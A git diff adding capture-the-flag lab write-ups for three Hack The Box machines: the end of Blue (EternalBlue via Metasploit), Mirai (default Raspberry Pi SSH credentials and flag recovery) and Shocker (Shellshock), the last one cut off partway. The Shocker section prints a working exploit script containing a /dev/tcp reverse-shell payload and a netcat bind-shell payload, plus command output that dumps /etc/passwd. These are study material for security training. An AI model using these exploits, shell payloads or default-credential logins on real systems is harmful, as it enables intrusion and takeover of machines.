+ msf5 > use exploit/windows/smb/ms17_010_eternalblue
+ msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
+
+ Module options (exploit/windows/smb/ms17_010_eternalblue):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 445 yes The target port (TCP)
+ SMBDomain . no (Optional) The Windows domain to use for authentication
+ SMBPass no (Optional) The password for the specified username
+ SMBUser no (Optional) The username to authenticate as
+ VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
+ VERIFY_TARGET true yes Check if remote OS matches exploit Target.
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
+
+
+ msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
+ RHOSTS => 10.10.10.40
+
+
+
+## **Part 3 : The Root Access**
+
+Let's see if we can exploit this machine using the EternalBlue metasploit module.
+
+
+ msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
+ RHOSTS => 10.10.10.40
+ msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
+ [*] 10.10.10.40:445 - Connecting to target for exploitation.
+ [+] 10.10.10.40:445 - Connection established for exploitation.
+ [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
+ [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
+ [*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
+ [*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
+ [*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
+ [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
+ [*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
+ [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
+ w[*] 10.10.10.40:445 - Starting non-paged pool grooming
+ h[+] 10.10.10.40:445 - Sending SMBv2 buffers
+ o[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
+ [*] 10.10.10.40:445 - Sending final SMBv2 buffers.
+ [*] 10.10.10.40:445 - Sending last fragment of exploit packet!
+ [*] 10.10.10.40:445 - Receiving response from exploit packet
+ [+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
+ [*] 10.10.10.40:445 - Sending egg to corrupted connection.
+ [*] 10.10.10.40:445 - Triggering free of corrupted buffer.
+ [*] Command shell session 1 opened (10.10.14.48:4444 -> 10.10.10.40:49158) at 2019-11-15 21:59:26 +0100
+ [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
+
+
+It spawned us an elevated privilege shell ! Now all we have to do is to print out the user and root flags.
+
+
+ C:\Users\haris\Desktop>more user.txt
+ more user.txt
+ 4cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ C:\Users\Administrator\Desktop>more root.txt
+ more root.txt
+ ffXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/12.md b/Easy/12.md
new file mode 100644
index 0000000..c8a8790
--- /dev/null
+++ b/Easy/12.md
@@ -0,0 +1,206 @@
+# Mirai Writeup
+
+
+
+## Introduction :
+
+Mirai is an easy linux box released back in September 2017. It features a misconfigured pi-hole service onto which the administrator seems to have deleted our precious root flag...
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.48
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 22:18 CET
+ Nmap scan report for 10.10.10.48
+ Host is up (0.058s latency).
+ Not shown: 997 closed ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
+ | ssh-hostkey:
+ | 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
+ | 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
+ | 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
+ |_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
+ 53/tcp open domain dnsmasq 2.76
+ | dns-nsid:
+ |_ bind.version: dnsmasq-2.76
+ 80/tcp open http lighttpd 1.4.35
+ |_http-server-header: lighttpd/1.4.35
+ |_http-title: Site doesnt have a title (text/html; charset=UTF-8).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 17.22 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Looking at our nmap results, we see that port 80 seems to be serving a lighthttp service. We could browse to the adress into our web browser, but for this example we will use the curl command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.48/
+ * Trying 10.10.10.48:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.48 (10.10.10.48) port 80 (#0)
+ > GET / HTTP/1.1
+ > Host: 10.10.10.48
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ < HTTP/1.1 404 Not Found
+ < X-Pi-hole: A black hole for Internet advertisements.
+ < Content-type: text/html; charset=UTF-8
+ < Content-Length: 0
+ < Date: Fri, 15 Nov 2019 21:28:22 GMT
+ < Server: lighttpd/1.4.35
+ <
+ * Connection #0 to host 10.10.10.48 left intact
+
+
+We see that the box seems to be running a the Pi-Hole service, which is basically a DNS loophole to avoid getting ads. We can suppose that the box may have misconfigured his ssh, and perhaps left the default user and password. which could potentially be using th credentials **pi:raspberry**
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → ssh pi@10.10.10.48
+ pi@10.10.10.48's password:
+ Permission denied, please try again.
+ pi@10.10.10.48's password:
+
+ The programs included with the Debian GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc//copyright.
+
+ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ Last login: Sun Aug 27 14:47:50 2017 from localhost
+
+ SSH is enabled and the default password for the 'pi' user has not been changed.
+ This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
+
+
+ SSH is enabled and the default password for the 'pi' user has not been changed.
+ This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
+
+ pi@raspberrypi:~ $ whoami
+ pi
+
+ pi@raspberrypi:~ $ uname -a
+ Linux raspberrypi 3.16.0-4-686-pae #1 SMP Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
+
+ pi@raspberrypi:~ $ cat /home/pi/Desktop/user.txt
+ ff837707441b257a20e32199d7c8838d
+
+
+Our assumptions have been confirmed, the box has left it's ssh service misconfigured, giving us a shell logged as the default user pi. Therefore allowing us to capture the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to capture the root flag we will try to escalate privileges using the sudo -i command.
+
+
+ pi@raspberrypi:~ $ sudo -i
+
+ SSH is enabled and the default password for the 'pi' user has not been changed.
+ This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
+
+
+ SSH is enabled and the default password for the 'pi' user has not been changed.
+ This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
+
+ root@raspberrypi:~# whoami
+ root
+ root@raspberrypi:~# cat /root/root.txt
+ I lost my original root.txt! I think I may have a backup on my USB stick...
+
+
+We have been able to escalate privileges ! However the root flag seems to be elsewhere on a supposed usb stick. Let's see which external drives are mounted using the **mount** command.
+
+
+ root@raspberrypi:~# mount
+ sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
+ proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
+ tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755)
+ /dev/sda1 on /lib/live/mount/persistence/sda1 type iso9660 (ro,noatime)
+ /dev/loop0 on /lib/live/mount/rootfs/filesystem.squashfs type squashfs (ro,noatime)
+ tmpfs on /lib/live/mount/overlay type tmpfs (rw,relatime)
+ /dev/sda2 on /lib/live/mount/persistence/sda2 type ext4 (rw,noatime,data=ordered)
+ aufs on / type aufs (rw,noatime,si=f1429df6,noxino)
+ devtmpfs on /dev type devtmpfs (rw,nosuid,size=10240k,nr_inodes=58955,mode=755)
+ securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
+ tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
+ devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
+ tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
+ tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
+ cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
+ pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
+ cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
+ cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
+ cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
+ cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
+ cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
+ cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
+ cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
+ systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
+ debugfs on /sys/kernel/debug type debugfs (rw,relatime)
+ hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
+ mqueue on /dev/mqueue type mqueue (rw,relatime)
+ tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime)
+
+ **/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)**
+ tmpfs on /run/user/999 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=999,gid=997)
+ tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=1000,gid=1000)
+
+
+
+We seem to have a folder to work with : **/media/usbstick**
+
+
+ root@raspberrypi:~# cd /media/usbstick
+ root@raspberrypi:/media/usbstick# ls
+ damnit.txt lost+found
+ root@raspberrypi:/media/usbstick# cat damnit.txt
+ Damnit! Sorry man I accidentally deleted your files off the USB stick.
+ Do you know if there is any way to get them back?
+
+ -James
+
+
+
+Yet another troll ! Although we do know that we are on the /dev/sdb partition, we will use the **strings** command to list the previous commands that happenned on /dev/sdb and hopefully find a way to get to the root flag.
+
+
+ root@raspberrypi:/media/usbstick# strings /dev/sdb
+ >r &
+ /media/usbstick
+ lost+found
+ root.txt
+ damnit.txt
+ >r &
+ >r &
+ /media/usbstick
+ lost+found
+ root.txt
+ damnit.txt
+ >r &
+ /media/usbstick
+ 2]8^
+ lost+found
+ root.txt
+ damnit.txt
+ >r &
+ **3dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+ Damnit! Sorry man I accidentally deleted your files off the USB stick.
+ Do you know if there is any way to get them back?
+ -James
+
+
+And that's it ! We have finally found the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/13.md b/Easy/13.md
new file mode 100644
index 0000000..f89b708
--- /dev/null
+++ b/Easy/13.md
@@ -0,0 +1,523 @@
+# Shocker Writeup
+
+
+
+## Introduction :
+
+Shocker is an easy Linux Box released back in September 2017. It features the well known shellshock vulnerability.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap 10.10.10.56 -sC -sV
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-16 10:12 CET
+ Nmap scan report for 10.10.10.56
+ Host is up (0.065s latency).
+ Not shown: 998 closed ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Site doesnt have a title (text/html).
+ 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
+ | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
+ |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.43 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap result tells us that port 80 seems to be serving an Apache httpd 2.4.18 service, let's see if we can dig in a little more information...
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.56/
+ * Trying 10.10.10.56:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.56 (10.10.10.56) port 80 (#0)
+ > GET / HTTP/1.1
+ > Host: 10.10.10.56
+ > User-Agent: curl/7.67.0
+ > Accept: */ *
+ >
+ * Mark bundle as not supporting multiuse
+ < HTTP/1.1 200 OK
+ < Date: Sat, 16 Nov 2019 09:25:00 GMT
+ < Server: Apache/2.4.18 (Ubuntu)
+ < Last-Modified: Fri, 22 Sep 2017 20:01:19 GMT
+ < ETag: "89-559ccac257884"
+ < Accept-Ranges: bytes
+ < Content-Length: 137
+ < Vary: Accept-Encoding
+ < Content-Type: text/html
+ <
+ <****!DOCTYPE html> <****html> <****body> <****h2>Dont Bug Me!** h2>
+ <****img src="bug.jpg" alt="bug" style="width:450px;height:350px;"> <****/body> <****/html>
+ * Connection #0 to host 10.10.10.56 left intact
+
+Looking at the results , the URL http://10.10.10.56/ doesnt seem to yield that much results. Let's run the dirbusting command **dirb** to try to find out which directories are being hosted by the httpd service.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.56/
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Sat Nov 16 10:23:02 2019
+ URL_BASE: http://10.10.10.56/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.56/ ----
+ + http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)
+ + http://10.10.10.56/index.md (CODE:200|SIZE:137)
+ + http://10.10.10.56/server-status (CODE:403|SIZE:299)
+
+ -----------------
+ END_TIME: Sat Nov 16 10:26:12 2019
+ DOWNLOADED: 4612 - FOUND: 3
+
+
+Dirbuster returned with 2 interesting results : /cgi-bin/ /server-status Although both of these seem to be returning the 403 Forbidden error. Let's see if we can find any good results within the /cgi-bin/ for example a .sh file, we will use dirbuster one more time using the common files txt wordlist.
+
+
+ λ root [ 10.10.14.48/23 ] [share/wordlists/dirb] → curl -vsk https://raw.githubusercontent.com/digination/dirbuster-ng/master/wordlists/common.txt > common.txt
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → dirb http://10.10.10.56/cgi-bin/ -w /usr/share/dirb/common.txt -X .sh
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Sat Nov 16 10:52:59 2019
+ URL_BASE: http://10.10.10.56/cgi-bin/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+ OPTION: Not Stoping on warning messages
+ EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ + http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118)
+
+ -----------------
+ END_TIME: Sat Nov 16 10:56:07 2019
+ DOWNLOADED: 4612 - FOUND: 1
+
+
+Dirbuster found the user.sh file within the /cgi-bin/ folder ! Let's download it using the **wget** command, and print out it's content.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → wget http://10.10.10.56/cgi-bin/user.sh
+ --2019-11-16 10:56:29-- http://10.10.10.56/cgi-bin/user.sh
+ Connecting to 10.10.10.56:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: unspecified [text/x-sh]
+ Saving to: ‘user.sh’
+
+ user.sh [ <=> ] 118 --.-KB/s in 0.001s
+
+ 2019-11-16 10:56:29 (195 KB/s) - ‘user.sh’ saved [118]
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → cat user.sh
+ Content-Type: text/plain
+
+ Just an uptime test script
+
+ 04:58:44 up 2:11, 0 users, load average: 0.01, 0.00, 0.00
+
+
+
+This seems to ring a bell, this may in fact be the shellshock vulnerability ! We run a quick **searchsploit** to find which exploit number corresponds to the shellshock CVE.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → searchsploit shellshock
+ ------------------------------------------------------------------------------ ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------------------------------------------ ----------------------------------------
+ Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection ( | exploits/cgi/remote/38849.rb
+ **Apache mod_cgi - 'Shellshock' Remote Command Injection | exploits/linux/remote/34900.py**
+ Bash - 'Shellshock' Environment Variables Command Injection | exploits/linux/remote/34766.php
+ Bash CGI - 'Shellshock' Remote Command Injection (Metasploit) | exploits/cgi/webapps/34895.rb
+ Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock) | exploits/hardware/remote/39568.py
+ GNU Bash - 'Shellshock' Environment Variable Command Injection | exploits/linux/remote/34765.txt
+ IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit | exploits/cgi/remote/39918.rb
+ NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock) | exploits/cgi/webapps/40213.txt
+ OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection | exploits/linux/remote/34879.txt
+ PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Inj | exploits/php/webapps/35146.txt
+ Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection | exploits/linux/remote/34896.py
+ RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection | exploits/linux/local/40938.py
+ Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Inject | exploits/cgi/webapps/39887.txt
+ TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Com | exploits/hardware/remote/40619.py
+ dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock) | exploits/linux/remote/36933.py
+ ------------------------------------------------------------------------------ ----------------------------------------
+ Shellcodes: No Result
+
+
+Seems like the exploit n° 34900 corresponds to the box that we have, Apache, mod_cgi, Shellshock let's run a quick locate and cp command to copy the script onto our current directory for further inspection.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → locate 34900.py
+ /usr/share/exploitdb/exploits/linux/remote/34900.py
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → cp /usr/share/exploitdb/exploits/linux/remote/34900.py .
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → nano 34900.py
+
+
+Here is the official python script that we could be using :
+
+
+ #! /usr/bin/env python
+ from socket import *
+ from threading import Thread
+ import thread, time, httplib, urllib, sys
+
+ stop = False
+ proxyhost = ""
+ proxyport = 0
+
+ def usage():
+ print ("""
+ Usage : python2 exploit.py payload=reverse rhost= lhost= lport= pages=cgi-bin/user.sh
+ """)
+ sys.exit(0)
+
+ def exploit(lhost,lport,rhost,rport,payload,pages):
+ headers = {"Cookie": payload, "Referer": payload}
+
+ for page in pages:
+ if stop:
+ return
+ print ("[-] Trying exploit on : "+page)
+ if proxyhost != "":
+ c = httplib.HTTPConnection(proxyhost,proxyport)
+ c.request("GET","http://"+rhost+page,headers=headers)
+ res = c.getresponse()
+ else:
+ c = httplib.HTTPConnection(rhost)
+ c.request("GET",page,headers=headers)
+ res = c.getresponse()
+ if res.status == 404:
+ print( "[*] 404 on : "+page)
+ time.sleep(1)
+ args = {}
+
+
+ for arg in sys.argv[1:]:
+ ar = arg.split("=")
+ args[ar[0]] = ar[1]
+ try:
+ args['payload']
+ except:
+ usage()
+
+ if args['payload'] == 'reverse':
+ try:
+ lhost = args['lhost']
+ lport = int(args['lport'])
+ rhost = args['rhost']
+ payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
+ except:
+ usage()
+
+ elif args['payload'] == "bind":
+ try:
+ rhost = args['rhost']
+ rport = args['rport']
+ payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
+ except:
+ usage()
+ else:
+ print( "[*] Unsupported payload")
+ usage()
+ try:
+ pages = args['pages'].split(",")
+ except:
+ pass
+
+ if args['payload'] == 'reverse':
+ serversocket = socket(AF_INET, SOCK_STREAM)
+ buff = 1024
+ addr = (lhost,lport)
+ serversocket.bind(addr)
+ serversocket.listen(10)
+ print ("[!] Started reverse shell handler")
+ thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
+ if args['payload'] == 'bind':
+ serversocket = socket(AF_INET, SOCK_STREAM)
+ addr = (rhost,int(rport))
+ thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
+
+ buff = 1024
+
+ while True:
+ if args['payload'] == 'reverse':
+ clientsocket, clientaddr = serversocket.accept()
+ print ("[!] Successfully exploited")
+ print ("[!] Incoming connection from "+clientaddr[0])
+ stop = True
+ clientsocket.settimeout(3)
+ while True:
+ reply = raw_input(clientaddr[0]+"> ")
+ clientsocket.sendall(reply+"\n")
+ try:
+ data = clientsocket.recv(buff)
+ print (data)
+ except:
+ pass
+
+ if args['payload'] == 'bind':
+ try:
+ serversocket = socket(AF_INET, SOCK_STREAM)
+ time.sleep(1)
+ serversocket.connect(addr)
+ print ("[!] Successfully exploited")
+ print ("[!] Connected to "+rhost)
+ stop = True
+ serversocket.settimeout(3)
+ while True:
+ reply = raw_input(rhost+"> ")
+ serversocket.sendall(reply+"\n")
+ data = serversocket.recv(buff)
+ print( data)
+ except:
+ pass
+
+
+If we wanted to execute the aforementionned python script, we would follow the syntax given in the script itself : **python2 34900.py payload=reverse rhost= lhost= lport= pages=cgi-bin/user.sh** Although we will go for another, more elaborate alternative which has been developped by [ncc group](https://github.com/nccgroup/shocker).
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Shocker] → wget https://raw.githubusercontent.com/nccgroup/shocker/master/shocker.py
+ --2019-11-16 11:28:02-- https://raw.githubusercontent.com/nccgroup/shocker/master/shocker.py
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 17942 (18K) [text/plain]
+ Saving to: ‘shocker.py’
+
+ shocker.py 100%[===================================================================================================>] 17.52K --.-KB/s in 0.02s
+
+ 2019-11-16 11:28:02 (828 KB/s) - ‘shocker.py’ saved [17942/17942]
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Shocker] → python2 shocker.py
+
+ .-. . .
+ ( )| |
+ `-. |--. .-. .-.|.-. .-. .--.
+ ( )| |( )( |-.'(.-' |
+ `-' ' `-`-' `-'' `-`--' v1.1
+
+ Tom Watson, tom.watson@nccgroup.trust
+ https://www.github.com/nccgroup/shocker
+
+ Released under the GNU Affero General Public License
+ (https://www.gnu.org/licenses/agpl-3.0.html)
+
+
+ usage: shocker.py [-h] (--Host HOST | --file FILE)
+ [--cgilist CGILIST | --cgi CGI] [--port PORT]
+ [--command COMMAND] [--proxy PROXY] [--ssl]
+ [--threads THREADS] [--verbose] [--debug]
+ shocker.py: error: one of the arguments --Host/-H --file/-f is required
+
+
+As you can see it seems to have a simpler syntax for us to use. Let's test our second python script onto our target and see if we get any results. We will use the -H , --command, -c and --verbose flags.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Shocker] → python2 shocker.py -H 10.10.10.56 --command "/bin/cat /etc/passwd" -c /cgi-bin/user.sh --verbose
+
+ .-. . .
+ ( )| |
+ `-. |--. .-. .-.|.-. .-. .--.
+ ( )| |( )( |-.'(.-' |
+ `-' ' `-`-' `-'' `-`--' v1.1
+
+ Tom Watson, tom.watson@nccgroup.trust
+ https://www.github.com/nccgroup/shocker
+
+ Released under the GNU Affero General Public License
+ (https://www.gnu.org/licenses/agpl-3.0.html)
+
+
+ [+] Single target '/cgi-bin/user.sh' being used
+ [+] Checking connectivity with target...
+ [I] Checking to see if 10.10.10.56 resolves...
+ [I] Resolved ok
+ [I] Checking to see if 10.10.10.56 is reachable on port 80...
+ [I] 10.10.10.56 seems reachable...
+ [+] Target was reachable
+ [+] Looking for vulnerabilities on 10.10.10.56:80
+ [I] Starting thread 1
+ [+] Finished host scan
+ [+] 1 potential target found, attempting exploits
+ [+] Trying exploit for http://10.10.10.56:80/cgi-bin/user.sh
+ [I] Flag set to: V74T37Z64S0NDC600N7U
+ [I] Header is: Content-type
+ [I] Attack string is: () { :;}; echo; echo V74T37Z64S0NDC600N7U; /bin/cat /etc/passwd
+ [!] http://10.10.10.56:80/cgi-bin/user.sh looks vulnerable
+ [!] Response returned was:
+
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+ systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+ systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+ systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+ syslog:x:104:108::/home/syslog:/bin/false
+ _apt:x:105:65534::/nonexistent:/bin/false
+ lxd:x:106:65534::/var/lib/lxd/:/bin/false
+ messagebus:x:107:111::/var/run/dbus:/bin/false
+ uuidd:x:108:112::/run/uuidd:/bin/false
+ dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
+ sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
+ shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash
+
+ [+] The following URLs appear to be exploitable:
+ [1] http://10.10.10.56:80/cgi-bin/user.sh
+ [+] Would you like to exploit further?
+ [>] Enter an URL number or 0 to exit: 0
+
+
+Our exploit worked ! we have been able to print out the contents of the /etc/passwd file. Now let's try to see if we can get a reverse shell connection on our 1337th port. We start by using the **netcat** command ready with the -lvnp flags to catch the incoming connection, within a second terminal.
+
